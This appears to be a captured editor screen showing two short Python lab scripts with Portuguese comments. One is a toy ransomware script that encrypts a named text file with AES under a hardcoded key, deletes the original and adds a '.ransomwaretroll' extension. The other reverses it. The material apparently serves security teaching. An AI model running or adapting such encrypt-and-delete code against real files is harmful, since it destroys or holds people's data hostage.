



```
File Actions Edit View Help
GNU nano 8.1criptografia.py
import os
import pyaes

#W abrir o arquivo a ser criptografado
file_name = "estrategia.txt"
file = open(file_name, "rb")
file_data = file.read()
file.close()

#W remover o arquivo
os.remove(file_name)

#W chave de criptografia
key = b"testransomwares"
aes = pyaes.AESModeOfOperationCTR(key)

#W criptografar o arquivo
cripto_data = aes.encrypt(file_data)

#W salvar o arquivo criptografado
new_file = file_name + ".ransomwaretroll"
new_file = open(f'{new_file}', "wb")
new_file.write(cripto_data)
new_file.close()
```

Auto-capturar o teclado...

Help Exit Write Out Read File Where Is Replace Cut Paste Execute Justify Location Go To Line Undo Redo Set Mark Copy To Bracket Where Was Previous Next

Right Control

```
File Actions Edit View Help
GNU nano 8.1descriptografia.py
import os
import pyaes

#W abrir o arquivo criptografado
file_name = "estrategia.txt.ransomwaretroll"
file = open(file_name, "rb")
file_data = file.read()
file.close()

#W chave para descriptografia
key = b"testransomwares"
aes = pyaes.AESModeOfOperationCTR(key)
decrypt_data = aes.decrypt(file_data)

#W remover o arquivo criptografado
os.remove(file_name)

#W criar o arquivo descriptografado
new_file = "estrategia.txt"
new_file = open(f'{new_file}', "wb")
new_file.write(decrypt_data)
new_file.close()
```

Auto-capturar o teclado...

Help Exit Write Out Read File Where Is Replace Cut Paste Execute Justify Location Go To Line Undo Redo Set Mark Copy To Bracket Where Was Previous Next

Read 26 lines

Right Control